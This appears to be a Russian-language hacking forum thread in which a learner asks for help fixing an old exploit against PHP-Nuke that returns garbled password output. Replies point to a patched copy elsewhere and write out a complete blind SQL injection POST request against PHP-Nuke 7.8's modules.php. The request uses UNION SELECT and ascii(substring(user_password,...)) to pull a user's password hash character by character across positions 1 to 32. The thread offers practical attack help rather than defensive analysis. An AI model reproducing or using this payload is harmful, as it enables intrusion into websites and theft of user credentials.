вообщем, это уже дело принципа, а с++ я только учу.

Есть давнишний сплойт от rst http://www.e-hack.org/exploit/archive/014.txt
если сорцы не править, выдаёт
[!] Please wait...
[+] Password: cccccccccccccccccccccccccccccccc

Заккоментировал
/*sprintf(result+pos-1,"%c",res);*/

и
/*result[33] = '\0';*/

выдает пароль вида
[!] Please wait...
[+] Password: x�dM$dSMHc


Намекните хотя бы, куда копать?!

http://someshit.net/showthread.php?t=20
тут правленое)

Если ты про первый, то он под Vc++ , а винды сейчас нет.
Следующий - не собирается, да и не тот он =)

А что мешает вручную отправлять пакеты серверу?
например так:

POST http://HOST/modules.php HTTP/1.0\n
Host: HOST
Content-Type: application/x-www-form-urlencoded\n
Content-Length: длина post запроса\n\n

name=PHP-Nuke+7.8+Exploit'UNION+SELECT+1,1+FROM+PREFIX_user s+WHERE+user_id=USER_ID+AND+ascii(substring(user_p assword,1,1))/*



и просто напросто менять 1 на 2,3,4,5...32. ну соответственно PREFIX, USER_ID, HOST и длина post запроса